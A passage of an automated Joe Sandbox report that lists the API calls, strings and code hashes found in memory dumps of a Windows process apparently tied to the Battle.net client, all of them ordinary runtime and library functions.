                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55723
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5575B
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B55794
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5586E
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 801482897-3573081731
                                                                                                                                                                            • Opcode ID: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                                                                                            • Instruction ID: 5743fc2315ae1ebc6a1607840c8a7fee26c8b02fcd2d4fd3b4617e766fbe98da
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CEBAA08B81CAE765CF30D99046E7BA4FB45F91B146235CFA953794DF38E485CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17069
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17077
                                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17090
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B170A2
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17110
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B1711C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                                            • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                                                                                            • Instruction ID: ac9de12ff600e4cfa20f21aa2dbfcc4e3212f960197166870058849a06d98ac6
                                                                                                                                                                            • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C31A169B1A74291EF15DF22D804A772394BF0CFA0F2A6935ED1D67350EE3CE5458B00
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03665
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03673
                                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0368C
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0369E
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0370C
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03718
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                                            • Opcode ID: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                                                                                            • Instruction ID: 6f320f9a0fc9951bcad130f1813cf7db379241f66a3ac70aeee51a6c32f7783c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                                                                                            • Instruction Fuzzy Hash: DE31A2E9A1AA4185EF11DF22E8D8576239CBF48BA0F499534ED1D17760EF3CE0458B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowstd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 792165947-1866435925
                                                                                                                                                                            • Opcode ID: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                                                                                            • Instruction ID: db79249cd6d47d00e00c534f4a1dd36c0ca737020294820f5a6cb584f35b48e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                                                                                            • Instruction Fuzzy Hash: E321E1A6A18A4692FB14DF31E5513AA67A0FF44BC0F846036E74D17A95DF7CE4A1CB00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C3EE
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C40B
                                                                                                                                                                            • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C42B
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C448
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFBC1B4C453
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B4C464
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B4C416
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1539549574-3743323925
                                                                                                                                                                            • Opcode ID: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                                                                                            • Instruction ID: 90605d27f048d94dc19e11a96dca13aae1ce9c3c564d087af48e8f12a2d091f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 87210AAAA08B4182EB10DF31E55427A73B0EB98F94F446134DB4E63656EF3CE594CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memmove$freemallocmemcpy
                                                                                                                                                                            • String ID: https://www.battle.net/shop/simplecheckout/debug-harness$https://www.battle.net/shop/simplecheckout/error$https://www.battle.net/shop/simplecheckout/loading$https://www.battle.net/shop/simplecheckout/navbar
                                                                                                                                                                            • API String ID: 343939323-4034954138
                                                                                                                                                                            • Opcode ID: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                                                                                            • Instruction ID: a11df9105f526f89a6dca651eec368b8497b88b1dbd3aafad4fd0b8fc95f0c45
                                                                                                                                                                            • Opcode Fuzzy Hash: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                                                                                            • Instruction Fuzzy Hash: 4402FC32909F82D5E7119F34F5802A8B7B6FB44B58F958236CA8C57725EF38E1A5C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                                            • Opcode ID: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                                                                                            • Instruction ID: 8110994681b134ef2b06b8d597f4389c8933f7ebc27d67fcc64a5daeb44bc350
                                                                                                                                                                            • Opcode Fuzzy Hash: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51B3AAA09E8681EF659F31D44473B63B0AF48F81F3AA075DE4D66794DF2CD446CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                                            • Opcode ID: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                                                                                            • Instruction ID: c1c656048f32070a92904864624f923f6464135257d192d6d83aee47dbec94e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4351B1AAA09E4281FB698F71D44473B63B0AF44F85B77A175CE4D26794DF2CE442CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentThread$Xtime_diff_to_millis2xtime_get
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3218647749-0
                                                                                                                                                                            • Opcode ID: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                                                                                            • Instruction ID: 845375d6ae78d517a152e2368f1cee9fda818b0a564482adf0bc1b855c2ac995
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                                                                                            • Instruction Fuzzy Hash: 774111B9908A4287EB608F36D48427B73B1EB49B44F50A075DA4E726A1DF3DE885CF14
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                                                                                            • Instruction ID: d2dd9cfb73150b24e0fc8dd71c6ee6341ec0e98fa997fdb2d26850c4fe0cb572
                                                                                                                                                                            • Opcode Fuzzy Hash: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F00722A1448B90EEB4FBB0E4D29F85321AF64B14FC40931D60D850DB9F14DD57C3A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                                                                                            • Instruction ID: cecc932bf2cae85c3bb82ffe64d8aeb671104c687f45f3c1c3ec20c4fad8d676
                                                                                                                                                                            • Opcode Fuzzy Hash: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                                                                                            • Instruction Fuzzy Hash: 95E15A33A09B8689EB20DF34E8802ADB7B5FB44788F848535DA8D47B69EF38D554C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: document.body.scrollLeft = $document.body.scrollTop =
